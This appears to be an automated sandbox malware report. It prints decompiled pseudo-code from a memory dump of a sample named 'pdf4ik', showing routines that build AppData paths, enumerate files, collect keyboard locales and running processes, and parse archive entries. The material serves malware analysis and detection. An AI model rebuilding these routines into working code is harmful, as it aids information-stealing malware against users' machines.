                                        					_v4036 = _t289;
                                        					E29D97940( &_v4052, _t382, _t289);
                                        					_v8 = 2;
                                        					_t270 = E29DA48F0( &_v4052,  &_v4220, _t348);
                                        					_v8 = 3;
                                        					_t331 =  *0x29dd7e68; // 0x1597268
                                        					_t272 = E29D95460( &_v4136,  &_v4192, _t331);
                                        					_v8 = 4;
                                        					_t378 = E29D89980(_t270, _t272,  &_v4108);
                                        					_v8 = 5;
                                        					_t276 = E29DA48F0( &_v4052,  &_v4080,  &_v4108);
                                        					_v8 = 6;
                                        					_t277 =  *0x29dd7cb8; // 0x1597088
                                        					_t278 = E29D89930(_t277,  &_v4164, _t276);
                                        					_t395 = _t395 + 0x14;
                                        					_v8 = 7;
                                        					if( *((intOrPtr*)(_t378 + 0x14)) >= 0x10) {
                                        						_t378 =  *_t378;
                                        					}
                                        					if( *((intOrPtr*)(_t278 + 0x14)) >= 0x10) {
                                        						_t278 =  *_t278;
                                        					}
                                        					_t335 =  *((intOrPtr*)(_v4244 + 0x20));
                                        					if(_t335 != 0) {
                                        						__eflags =  *_t335 - 2;
                                        						if( *_t335 == 2) {
                                        							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t335 + 4)), _t378, _t278, 0, 2);
                                        							_t348 = 0x10;
                                        						} else {
                                        							 *0x29dd8814 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd8814 = 0x10000;
                                        					}
                                        					if(_v4144 >= _t348) {
                                        						_push(_v4164);
                                        						E29DADF3B();
                                        						_t395 = _t395 + 4;
                                        						_t348 = 0x10;
                                        					}
                                        					_v4144 = 0xf;
                                        					_v4148 = 0;
                                        					_v4164 = 0;
                                        					if(_v4060 >= _t348) {
                                        						_push(_v4080);
                                        						E29DADF3B();
                                        						_t395 = _t395 + 4;
                                        						_t348 = 0x10;
                                        					}
                                        					_v4060 = 0xf;
                                        					_v4064 = 0;
                                        					_v4080 = 0;
                                        					if(_v4088 >= _t348) {
                                        						_push(_v4108);
                                        						E29DADF3B();
                                        						_t395 = _t395 + 4;
                                        						_t348 = 0x10;
                                        					}
                                        					_v4088 = 0xf;
                                        					_v4092 = 0;
                                        					_v4108 = 0;
                                        					if(_v4116 >= _t348) {
                                        						_push(_v4136);
                                        						E29DADF3B();
                                        						_t395 = _t395 + 4;
                                        						_t348 = 0x10;
                                        					}
                                        					_v4116 = 0xf;
                                        					_v4120 = 0;
                                        					_v4136 = 0;
                                        					if(_v4200 >= _t348) {
                                        						_push(_v4220);
                                        						E29DADF3B();
                                        						_t395 = _t395 + 4;
                                        					}
                                        					_v8 = 1;
                                        					if(_v4032 >= 8) {
                                        						_push(_v4052);
                                        						E29DADF3B();
                                        						_t395 = _t395 + 4;
                                        					}
                                        					_t382 = _t382 + 0x1c;
                                        					_t289 = 0;
                                        				} while (_t382 != _v4224);
                                        				goto L27;
                                        				L1:
                                        				_t300 =  *_t197;
                                        				_t197 = _t197 + 1;
                                        				if(_t300 != 0) {
                                        					goto L1;
                                        				} else {
                                        					E29D892C0( &_v4192, _t365, _t197 - _t381);
                                        					_v8 = 0;
                                        					E29DB5640( &_v1024, 0, 0x3e8);
                                        					E29DB5640( &_v3024, 0, 0x3e8);
                                        					E29DB5640( &_v2024, 0, 0x3e8);
                                        					_t24 = (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v2024) < 0x00000000) - 1; // -1
                                        					lstrcatA( &_v1024, _t24 &  &_v2024);
                                        					_t305 =  *0x29dd7e68; // 0x1597268
                                        					lstrcatA( &_v1024, _t305);
                                        					_t211 =  *0x29dd7b2c; // 0x15a4b80
                                        					lstrcatA( &_v1024, _t211);
                                        					E29DB5640( &_v2024, 0, 0x3e8);
                                        					_t33 = (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v2024) < 0x00000000) - 1; // -1
                                        					lstrcatA( &_v3024, _t33 &  &_v2024);
                                        					_t309 =  *0x29dd7ffc; // 0x15a40d8
                                        					lstrcatA( &_v3024, _t309);
                                        					lstrcatA( &_v3024, "*");
                                        					_t395 = _t390 + 0x30 - 0x1c;
                                        					_t310 = _t395;
                                        					_t223 =  &_v1024;
                                        					 *((intOrPtr*)(_t310 + 0x14)) = 0xf;
                                        					 *((intOrPtr*)(_t310 + 0x10)) = 0;
                                        					_v4224 = _t395;
                                        					 *_t310 = 0;
                                        					_t366 = _t223 + 1;
                                        					goto L3;
                                        				}
                                        			}
                                        0x29d9cc37
                                        0x29d9cc4a
                                        0x29d9cc56
                                        0x29d9cc64
                                        0x29d9cc68
                                        0x29d9cc6d
                                        0x29d9cc72
                                        0x29d9cc7d
                                        0x29d9cc82
                                        0x29d9cc8a
                                        0x29d9cc91
                                        0x29d9cc93
                                        0x29d9cc93
                                        0x29d9cc98
                                        0x29d9cc9a
                                        0x29d9cc9a
                                        0x29d9cca2
                                        0x29d9cca9
                                        0x29d9ccb7
                                        0x29d9ccba
                                        0x29d9ccd6
                                        0x29d9ccdb
                                        0x29d9ccbc
                                        0x29d9ccbc
                                        0x29d9ccbc
                                        0x29d9ccab
                                        0x29d9ccab
                                        0x29d9ccab
                                        0x29d9cce6
                                        0x29d9ccee
                                        0x29d9ccef
                                        0x29d9ccf4
                                        0x29d9ccf7
                                        0x29d9ccf7
                                        0x29d9cd01
                                        0x29d9cd07
                                        0x29d9cd0d
                                        0x29d9cd19
                                        0x29d9cd21
                                        0x29d9cd22
                                        0x29d9cd27
                                        0x29d9cd2a
                                        0x29d9cd2a
                                        0x29d9cd2f
                                        0x29d9cd35
                                        0x29d9cd3b
                                        0x29d9cd47
                                        0x29d9cd4f
                                        0x29d9cd50
                                        0x29d9cd55
                                        0x29d9cd58
                                        0x29d9cd58
                                        0x29d9cd5d
                                        0x29d9cd63
                                        0x29d9cd69
                                        0x29d9cd75
                                        0x29d9cd7d
                                        0x29d9cd7e
                                        0x29d9cd83
                                        0x29d9cd86
                                        0x29d9cd86
                                        0x29d9cd8b
                                        0x29d9cd91
                                        0x29d9cd97
                                        0x29d9cda3
                                        0x29d9cdab
                                        0x29d9cdac
                                        0x29d9cdb1
                                        0x29d9cdb1
                                        0x29d9cdb4
                                        0x29d9cdbf
                                        0x29d9cdc7
                                        0x29d9cdc8
                                        0x29d9cdcd
                                        0x29d9cdcd
                                        0x29d9cdd0
                                        0x29d9cdd3
                                        0x29d9cdd5
                                        0x29d9cde1
                                        0x29d9cde7
                                        0x00000000
                                        0x29d9cb85
                                        0x29d9cb85
                                        0x29d9cb8d
                                        0x29d9cbbd
                                        0x29d9cbbd
                                        0x29d9cbbe
                                        0x29d9cbc3
                                        0x00000000
                                        0x29d9cbc3
                                        0x29d9cb90
                                        0x29d9cb94
                                        0x29d9cb98
                                        0x29d9cb99
                                        0x29d9cb9e
                                        0x29d9cb9e
                                        0x29d9cba1
                                        0x29d9cba3
                                        0x29d9cbaa
                                        0x29d9cbad
                                        0x29d9cbb0
                                        0x29d9cbb3
                                        0x29d9cbb7
                                        0x00000000
                                        0x29d9cbb7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9c8d1
                                        0x29d9c8d1
                                        0x29d9c8d4
                                        0x29d9c8e5
                                        0x29d9c8ef
                                        0x29d9c8f5
                                        0x29d9c902
                                        0x29d9c906
                                        0x29d9c90d
                                        0x29d9c911
                                        0x29d9c926
                                        0x29d9c939
                                        0x29d9c945
                                        0x29d9c953
                                        0x29d9c957
                                        0x29d9c95c
                                        0x29d9c961
                                        0x29d9c96c
                                        0x29d9c971
                                        0x29d9c979
                                        0x29d9c980
                                        0x29d9c982
                                        0x29d9c982
                                        0x29d9c987
                                        0x29d9c989
                                        0x29d9c989
                                        0x29d9c991
                                        0x29d9c998
                                        0x29d9c9a6
                                        0x29d9c9a9
                                        0x29d9c9c5
                                        0x29d9c9ca
                                        0x29d9c9ab
                                        0x29d9c9ab
                                        0x29d9c9ab
                                        0x29d9c99a
                                        0x29d9c99a
                                        0x29d9c99a
                                        0x29d9c9d5
                                        0x29d9c9dd
                                        0x29d9c9de
                                        0x29d9c9e3
                                        0x29d9c9e6
                                        0x29d9c9e6
                                        0x29d9c9f0
                                        0x29d9c9f6
                                        0x29d9c9fc
                                        0x29d9ca08
                                        0x29d9ca10
                                        0x29d9ca11
                                        0x29d9ca16
                                        0x29d9ca19
                                        0x29d9ca19
                                        0x29d9ca1e
                                        0x29d9ca24
                                        0x29d9ca2a
                                        0x29d9ca36
                                        0x29d9ca3e
                                        0x29d9ca3f
                                        0x29d9ca44
                                        0x29d9ca47
                                        0x29d9ca47
                                        0x29d9ca4c
                                        0x29d9ca52
                                        0x29d9ca58
                                        0x29d9ca64
                                        0x29d9ca6c
                                        0x29d9ca6d
                                        0x29d9ca72
                                        0x29d9ca75
                                        0x29d9ca75
                                        0x29d9ca7a
                                        0x29d9ca80
                                        0x29d9ca86
                                        0x29d9ca92
                                        0x29d9ca9a
                                        0x29d9ca9b
                                        0x29d9caa0
                                        0x29d9caa0
                                        0x29d9caa3
                                        0x29d9caae
                                        0x29d9cab6
                                        0x29d9cab7
                                        0x29d9cabc
                                        0x29d9cabc
                                        0x29d9cabf
                                        0x29d9cac2
                                        0x29d9cac4
                                        0x00000000
                                        0x29d9c751
                                        0x29d9c751
                                        0x29d9c753
                                        0x29d9c756
                                        0x00000000
                                        0x29d9c758
                                        0x29d9c762
                                        0x29d9c774
                                        0x29d9c777
                                        0x29d9c78c
                                        0x29d9c7a1
                                        0x29d9c7c8
                                        0x29d9c7d5
                                        0x29d9c7db
                                        0x29d9c7e9
                                        0x29d9c7ef
                                        0x29d9c7fc
                                        0x29d9c80f
                                        0x29d9c836
                                        0x29d9c843
                                        0x29d9c849
                                        0x29d9c857
                                        0x29d9c869
                                        0x29d9c86f
                                        0x29d9c872
                                        0x29d9c874
                                        0x29d9c87a
                                        0x29d9c881
                                        0x29d9c884
                                        0x29d9c88a
                                        0x29d9c88c
                                        0x00000000
                                        0x29d9c88c

                                        APIs
                                        • _memset.LIBCMT ref: 29D9C70A
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000000,?,?,?,?,29D94906,00000000), ref: 29D9C71E
                                        • _memset.LIBCMT ref: 29D9C777
                                        • _memset.LIBCMT ref: 29D9C78C
                                        • _memset.LIBCMT ref: 29D9C7A1
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D9C7B5
                                        • lstrcatA.KERNEL32(?,-00000001), ref: 29D9C7D5
                                        • lstrcatA.KERNEL32(?,01597268), ref: 29D9C7E9
                                        • lstrcatA.KERNEL32(?,015A4B80), ref: 29D9C7FC
                                        • _memset.LIBCMT ref: 29D9C80F
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D9C823
                                        • lstrcatA.KERNEL32(?,-00000001), ref: 29D9C843
                                        • lstrcatA.KERNEL32(?,015A40D8), ref: 29D9C857
                                        • lstrcatA.KERNEL32(?,29DCFE74), ref: 29D9C869
                                          • Part of subcall function 29DA4C40: FindFirstFileW.KERNEL32(00000000,?,?,D9555F04,?,00000000,00000000), ref: 29DA4CA2
                                          • Part of subcall function 29DA4C40: FindNextFileW.KERNEL32(?,?,?), ref: 29DA4D46
                                          • Part of subcall function 29D97940: std::_Xinvalid_argument.LIBCPMT ref: 29D97957
                                          • Part of subcall function 29DA48F0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000010,?), ref: 29DA491E
                                          • Part of subcall function 29DA48F0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,29DA410F,00000000,00000000), ref: 29DA494C
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$FolderPath$ByteCharFileFindMultiWide$FirstNextXinvalid_argumentstd::_
                                        • String ID:
                                        • API String ID: 1016014242-0
                                        • Opcode ID: b37239cb3c6c60d05654fd0f3cd15fc6ad13cbd7bbe0bce87c3c5184f3c06524
                                        • Instruction ID: f3158ffa012471874f5bf69eefdf06bda4b0339c6c42cc86211293720c954c12
                                        • Opcode Fuzzy Hash: b37239cb3c6c60d05654fd0f3cd15fc6ad13cbd7bbe0bce87c3c5184f3c06524
                                        • Instruction Fuzzy Hash: 1D22B0B1D10299DBDB20DF24D884ADEB7B5AF58300F0085EDD14DA7640DB74AA85EFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E29DA3A00() {
                                        				signed int _v8;
                                        				char _v520;
                                        				CHAR* _v524;
                                        				int _v528;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t16;
                                        				void* _t19;
                                        				int _t23;
                                        				void* _t34;
                                        				int _t40;
                                        				int _t41;
                                        				signed int _t42;
                                        				signed int _t43;
                                        				void* _t44;
                                        				void* _t45;
                                        
                                        				_t16 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t16 ^ _t43;
                                        				_t19 = HeapAlloc(GetProcessHeap(), 0, 0x1f4);
                                        				_t40 = 0;
                                        				_v524 = _t19;
                                        				_t41 = GetKeyboardLayoutList(0, 0);
                                        				_t34 = LocalAlloc(0x40, _t41 * 4);
                                        				_t23 = GetKeyboardLayoutList(_t41, _t34);
                                        				_t42 = 0;
                                        				_v528 = _t23;
                                        				if(_t23 != 0) {
                                        					do {
                                        						_t39 =  *(_t34 + _t42 * 4) & 0x0000ffff;
                                        						GetLocaleInfoA( *(_t34 + _t42 * 4) & 0x0000ffff, 2,  &_v520, 0x200);
                                        						if(_t40 == 0) {
                                        							_t39 = _v524;
                                        							wsprintfA(_v524, "%s",  &_v520);
                                        							_t45 = _t44 + 0xc;
                                        						} else {
                                        							wsprintfA(_v524, "%s / %s", _v524,  &_v520);
                                        							_t45 = _t44 + 0x10;
                                        						}
                                        						_t40 = _t40 + 1;
                                        						E29DB5640( &_v520, 0, 0x200);
                                        						_t42 = _t42 + 1;
                                        						_t44 = _t45 + 0xc;
                                        					} while (_t42 < _v528);
                                        				}
                                        				if(_t34 != 0) {
                                        					LocalFree(_t34);
                                        				}
                                        				return E29DADF46(_v524, _t34, _v8 ^ _t43, _t39, _t40, _t42);
                                        			}

                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000001F4,00000010,0000000F,00000000), ref: 29DA3A1D
                                        • HeapAlloc.KERNEL32(00000000), ref: 29DA3A24
                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 29DA3A34
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 29DA3A46
                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 29DA3A50
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 29DA3A83
                                        • wsprintfA.USER32 ref: 29DA3AA1
                                        • wsprintfA.USER32 ref: 29DA3ABF
                                        • _memset.LIBCMT ref: 29DA3AD7
                                        • LocalFree.KERNEL32(00000000), ref: 29DA3AED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeapKeyboardLayoutListLocalwsprintf$FreeInfoLocaleProcess_memset
                                        • String ID: %s / %s
                                        • API String ID: 2849719339-2910687431
                                        • Opcode ID: 99e01a46642ce04d1a77f80452a2568c63e12a2355d58eec6cb6335bc4583195
                                        • Instruction ID: cd934978f8e5cf35a63ad799d497cd4b5990f376437b7ccbfc021f0b5ae124b6
                                        • Opcode Fuzzy Hash: 99e01a46642ce04d1a77f80452a2568c63e12a2355d58eec6cb6335bc4583195
                                        • Instruction Fuzzy Hash: 1521D6B2940368ABD710ABA4DC8DFABB77CEF44B05F008199F619E7141DA349D459FB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E29DA3B10(CHAR* __esi) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				intOrPtr _v28;
                                        				char _v32;
                                        				char _v48;
                                        				char _v312;
                                        				intOrPtr _v340;
                                        				void* _v348;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed int _t21;
                                        				signed int _t22;
                                        				int _t27;
                                        				int _t29;
                                        				CHAR* _t34;
                                        				void* _t40;
                                        				void* _t52;
                                        				void* _t53;
                                        				CHAR* _t54;
                                        				signed int _t55;
                                        				void* _t56;
                                        				void* _t57;
                                        
                                        				_t54 = __esi;
                                        				_push(0xffffffff);
                                        				_push(E29DC2E78);
                                        				_push( *[fs:0x0]);
                                        				_t57 = _t56 - 0x150;
                                        				_t21 =  *0x29dd5664; // 0xd9555f04
                                        				_t22 = _t21 ^ _t55;
                                        				_v20 = _t22;
                                        				_push(_t22);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v348 = 0x128;
                                        				_t52 = CreateToolhelp32Snapshot(2, 0);
                                        				if(Process32First(_t52,  &_v348) != 0) {
                                        					_t29 = Process32Next(_t52,  &_v348);
                                        					_t59 = _t29;
                                        					if(_t29 != 0) {
                                        						do {
                                        							lstrcatA(_t54, "- ");
                                        							lstrcatA(_t54,  &_v312);
                                        							lstrcatA(_t54, " [");
                                        							_t34 = E29DA4720( &_v48, _t59, _v340);
                                        							_v8 = 0;
                                        							if(_t34[0x14] >= 0x10) {
                                        								_t34 =  *_t34;
                                        							}
                                        							lstrcatA(_t54, _t34);
                                        							_v8 = 0xffffffff;
                                        							if(_v28 >= 0x10) {
                                        								_push(_v48);
                                        								E29DADF3B();
                                        								_t57 = _t57 + 4;
                                        							}
                                        							_v28 = 0xf;
                                        							_v32 = 0;
                                        							_v48 = 0;
                                        							lstrcatA(_t54, "]\n");
                                        							_t49 =  &_v348;
                                        						} while (Process32Next(_t52,  &_v348) != 0);
                                        					}
                                        				}
                                        				_t27 = CloseHandle(_t52);
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t53);
                                        				_pop(_t40);
                                        				return E29DADF46(_t27, _t40, _v20 ^ _t55, _t49, _t53, _t54);
                                        			}

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 29DA3B4B
                                        • Process32First.KERNEL32(00000000,00000128), ref: 29DA3B5B
                                        • Process32Next.KERNEL32(00000000,00000128), ref: 29DA3B71
                                        • lstrcatA.KERNEL32(?,29DD0850), ref: 29DA3B86
                                        • lstrcatA.KERNEL32(?,?), ref: 29DA3B94
                                        • lstrcatA.KERNEL32(?,29DCFC3C), ref: 29DA3BA0
                                        • lstrcatA.KERNEL32(?,00000000,?), ref: 29DA3BC4
                                        • lstrcatA.KERNEL32(?,29DCFC40), ref: 29DA3BF6
                                        • Process32Next.KERNEL32(00000000,00000128), ref: 29DA3C04
                                        • CloseHandle.KERNEL32(00000000), ref: 29DA3C13
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 2202764116-0
                                        • Opcode ID: 5a7e46f11ed0c4bfb3c238f085adebaa780c16c4e50cd2d56da0295b915ee5dd
                                        • Instruction ID: caf5ce400d660707a64ec8ef273355a56c4114c4b5b0180df00c64aa3dfcec42
                                        • Opcode Fuzzy Hash: 5a7e46f11ed0c4bfb3c238f085adebaa780c16c4e50cd2d56da0295b915ee5dd
                                        • Instruction Fuzzy Hash: A531A172940248AFD7119FA4DC88FEEB779FF49B01F00816DF511A7680DB385605AF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E29D8D7B0(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
                                        				signed int _v12;
                                        				char _v280;
                                        				char _v544;
                                        				struct _SYSTEMTIME _v560;
                                        				signed char _v561;
                                        				signed char _v562;
                                        				signed char _v563;
                                        				signed char _v564;
                                        				char _v566;
                                        				char _v567;
                                        				char _v568;
                                        				char _v572;
                                        				intOrPtr* _v576;
                                        				void* _v580;
                                        				struct _FILETIME _v588;
                                        				struct _FILETIME _v596;
                                        				struct _FILETIME _v604;
                                        				unsigned int _v636;
                                        				intOrPtr _v660;
                                        				intOrPtr _v664;
                                        				signed int _v672;
                                        				unsigned int _v688;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t182;
                                        				intOrPtr _t184;
                                        				signed int _t191;
                                        				void _t192;
                                        				signed int _t193;
                                        				void* _t194;
                                        				signed int _t196;
                                        				signed int _t197;
                                        				signed int _t198;
                                        				signed int _t199;
                                        				signed int _t200;
                                        				signed int _t201;
                                        				unsigned int _t204;
                                        				signed char _t206;
                                        				signed int _t208;
                                        				long _t216;
                                        				signed int _t222;
                                        				signed char _t223;
                                        				signed int _t239;
                                        				signed int _t248;
                                        				intOrPtr _t259;
                                        				signed int _t262;
                                        				signed int _t264;
                                        				void* _t274;
                                        				signed int _t282;
                                        				signed int _t287;
                                        				signed char _t296;
                                        				signed int _t298;
                                        				signed int _t304;
                                        				intOrPtr* _t310;
                                        				void* _t330;
                                        				void* _t342;
                                        				signed char _t349;
                                        				signed int _t365;
                                        				signed int _t370;
                                        				signed int _t372;
                                        				signed int _t374;
                                        				signed int _t375;
                                        				intOrPtr* _t382;
                                        				void* _t384;
                                        				void* _t389;
                                        				intOrPtr* _t393;
                                        				signed int _t394;
                                        				signed int _t397;
                                        				void* _t398;
                                        				void* _t399;
                                        				void* _t401;
                                        				void* _t402;
                                        
                                        				_t341 = __edx;
                                        				_t182 =  *0x29dd5664; // 0xd9555f04
                                        				_v12 = _t182 ^ _t397;
                                        				_t184 = _a4;
                                        				_t273 = __ecx;
                                        				_t393 = __edx;
                                        				_v576 = __ecx;
                                        				_v580 = __edx;
                                        				if(_t184 < 0xffffffff) {
                                        					L81:
                                        					__eflags = _v12 ^ _t397;
                                        					return E29DADF46(0x10000, _t273, _v12 ^ _t397, _t341, _t379, _t393);
                                        				} else {
                                        					_t379 =  *__ecx;
                                        					if(_t184 >=  *((intOrPtr*)( *__ecx + 4))) {
                                        						goto L81;
                                        					} else {
                                        						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                        							E29D8D630(__ecx, _t379);
                                        							_t184 = _a4;
                                        						}
                                        						_t273[1] = 0xffffffff;
                                        						if(_t184 != _t273[0x4d]) {
                                        							__eflags = _t184 - 0xffffffff;
                                        							if(_t184 != 0xffffffff) {
                                        								_t394 =  *_t273;
                                        								__eflags = _t184 -  *((intOrPtr*)(_t394 + 0x10));
                                        								if(_t184 <  *((intOrPtr*)(_t394 + 0x10))) {
                                        									E29D8CE10(_t394);
                                        									_t184 = _a4;
                                        								}
                                        								_t342 =  *_t273;
                                        								__eflags =  *((intOrPtr*)(_t342 + 0x10)) - _t184;
                                        								if( *((intOrPtr*)(_t342 + 0x10)) < _t184) {
                                        									do {
                                        										_t394 =  *_t273;
                                        										__eflags = _t394;
                                        										if(_t394 != 0) {
                                        											__eflags =  *(_t394 + 0x18);
                                        											if( *(_t394 + 0x18) != 0) {
                                        												_t259 =  *((intOrPtr*)(_t394 + 0x10)) + 1;
                                        												__eflags = _t259 -  *((intOrPtr*)(_t394 + 4));
                                        												if(_t259 !=  *((intOrPtr*)(_t394 + 4))) {
                                        													 *((intOrPtr*)(_t394 + 0x14)) =  *((intOrPtr*)(_t394 + 0x14)) +  *((intOrPtr*)(_t394 + 0x50)) +  *((intOrPtr*)(_t394 + 0x4c)) +  *((intOrPtr*)(_t394 + 0x48)) + 0x2e;
                                        													 *((intOrPtr*)(_t394 + 0x10)) = _t259;
                                        													_t262 = E29D8CA10(_t394, _t394 + 0x28, _t394 + 0x78, 0, 0);
                                        													_t398 = _t398 + 0x10;
                                        													asm("sbb eax, eax");
                                        													_t264 = 1 +  ~_t262;
                                        													__eflags = _t264;
                                        													 *(_t394 + 0x18) = _t264;
                                        												}
                                        											}
                                        										}
                                        										_t330 =  *_t273;
                                        										__eflags =  *((intOrPtr*)(_t330 + 0x10)) - _a4;
                                        									} while ( *((intOrPtr*)(_t330 + 0x10)) < _a4);
                                        								}
                                        								E29D8CA10( *_t273,  &_v688, 0,  &_v280, 0x104);
                                        								_t380 =  *_t273;
                                        								_t191 = E29D8CFB0( *_t273,  &(_v588.dwHighDateTime),  &_v568,  &_v572);
                                        								_t399 = _t398 + 0x1c;
                                        								__eflags = _t191;
                                        								if(_t191 == 0) {
                                        									_t344 =  *_t273;
                                        									_t192 =  *( *_t273);
                                        									__eflags =  *_t192;
                                        									if(__eflags == 0) {
                                        										 *((intOrPtr*)(_t192 + 0x1c)) = _v568;
                                        										goto L23;
                                        									} else {
                                        										__eflags =  *((char*)(1 + _t192));
                                        										if(__eflags == 0) {
                                        											L25:
                                        											__eflags = _v12 ^ _t397;
                                        											return E29DADF46(0x800, _t273, _v12 ^ _t397, _t344, _t380, _t394);
                                        										} else {
                                        											_t344 =  *(_t192 + 4);
                                        											SetFilePointer( *(_t192 + 4),  *((intOrPtr*)(_t192 + 0xc)) + _v568, 0, 0);
                                        											L23:
                                        											_t193 = E29DAD4FB(_t273, _t344, _v572, _t394, __eflags, _v572);
                                        											_t344 =  *_t273;
                                        											_t394 = _t193;
                                        											_t380 =  *( *_t273);
                                        											_t273 = 1;
                                        											_t194 = E29D8C480(1, _t380, _t394, _v572);
                                        											_t401 = _t399 + 0xc;
                                        											__eflags = _t194 - _v572;
                                        											if(_t194 == _v572) {
                                        												_t274 = _v580;
                                        												 *_t274 =  *( *_v576 + 0x10);
                                        												_t196 = 0;
                                        												__eflags = 0;
                                        												do {
                                        													_t282 =  *((intOrPtr*)(_t397 + _t196 - 0x114));
                                        													 *((char*)(_t397 + _t196 - 0x21c)) = _t282;
                                        													_t196 = _t196 + 1;
                                        													__eflags = _t282;
                                        												} while (_t282 != 0);
                                        												_t382 =  &_v544;
                                        												while(1) {
                                        													_t197 =  *_t382;
                                        													__eflags = _t197;
                                        													if(_t197 == 0) {
                                        														goto L32;
                                        													}
                                        													L30:
                                        													__eflags =  *((char*)(_t382 + 1)) - 0x3a;
                                        													if( *((char*)(_t382 + 1)) == 0x3a) {
                                        														_t382 = _t382 + 2;
                                        														while(1) {
                                        															_t197 =  *_t382;
                                        															__eflags = _t197;
                                        															if(_t197 == 0) {
                                        																goto L32;
                                        															}
                                        															goto L30;
                                        														}
                                        													}
                                        													L32:
                                        													__eflags = _t197 - 0x5c;
                                        													if(_t197 == 0x5c) {
                                        														_t382 = _t382 + 1;
                                        														while(1) {
                                        															_t197 =  *_t382;
                                        															__eflags = _t197;
                                        															if(_t197 == 0) {
                                        																goto L32;
                                        															}
                                        															goto L30;
                                        														}
                                        													}
                                        													__eflags = _t197 - 0x2f;
                                        													if(_t197 == 0x2f) {
                                        														_t382 = _t382 + 1;
                                        														while(1) {
                                        															_t197 =  *_t382;
                                        															__eflags = _t197;
                                        															if(_t197 == 0) {
                                        																goto L32;
                                        															}
                                        															goto L30;
                                        														}
                                        													}
                                        													_t198 = E29DAEA6C(_t382, "\\..\\");
                                        													_t401 = _t401 + 8;
                                        													__eflags = _t198;
                                        													if(_t198 != 0) {
                                        														_t69 = _t198 + 4; // 0x4
                                        														_t382 = _t69;
                                        														while(1) {
                                        															_t197 =  *_t382;
                                        															__eflags = _t197;
                                        															if(_t197 == 0) {
                                        																goto L32;
                                        															}
                                        															goto L30;
                                        														}
                                        													}
                                        													_t199 = E29DAEA6C(_t382, "\\../");
                                        													_t401 = _t401 + 8;
                                        													__eflags = _t199;
                                        													if(_t199 != 0) {
                                        														_t70 = _t199 + 4; // 0x4
                                        														_t382 = _t70;
                                        														while(1) {
                                        															_t197 =  *_t382;
                                        															__eflags = _t197;
                                        															if(_t197 == 0) {
                                        																goto L32;
                                        															}
                                        															goto L30;
                                        														}
                                        													}
                                        													_t200 = E29DAEA6C(_t382, "/../");
                                        													_t401 = _t401 + 8;
                                        													__eflags = _t200;
                                        													if(_t200 != 0) {
                                        														_t71 = _t200 + 4; // 0x4
                                        														_t382 = _t71;
                                        														while(1) {
                                        															_t197 =  *_t382;
                                        															__eflags = _t197;
                                        															if(_t197 == 0) {
                                        																goto L32;
                                        															}
                                        															goto L30;
                                        														}
                                        														goto L32;
                                        													}
                                        													_t201 = E29DAEA6C(_t382, "/..\\");
                                        													_t401 = _t401 + 8;
                                        													__eflags = _t201;
                                        													if(_t201 != 0) {
                                        														_t72 = _t201 + 4; // 0x4
                                        														_t382 = _t72;
                                        														continue;
                                        													}
                                        													E29DAE8E8(_t274 + 4, _t382, 0x104);
                                        													_t204 = _v636;
                                        													_v561 = _t204 >> 0x0000001e & 0x00000001;
                                        													_t287 = _v688 >> 8;
                                        													_t402 = _t401 + 0xc;
                                        													_t349 =  !(_t204 >> 0x17) & 0x00000001;
                                        													_v563 = 0;
                                        													_v564 = 0;
                                        													_v562 = 1;
                                        													__eflags = _t287;
                                        													if(_t287 == 0) {
                                        														L48:
                                        														_v563 = _t204 >> 0x00000001 & 0x00000001;
                                        														_v564 = _t204 >> 0x00000002 & 0x00000001;
                                        														_t349 = _t204 & 0x00000001;
                                        														_t296 = _t204 >> 0x00000004 & 0x00000001;
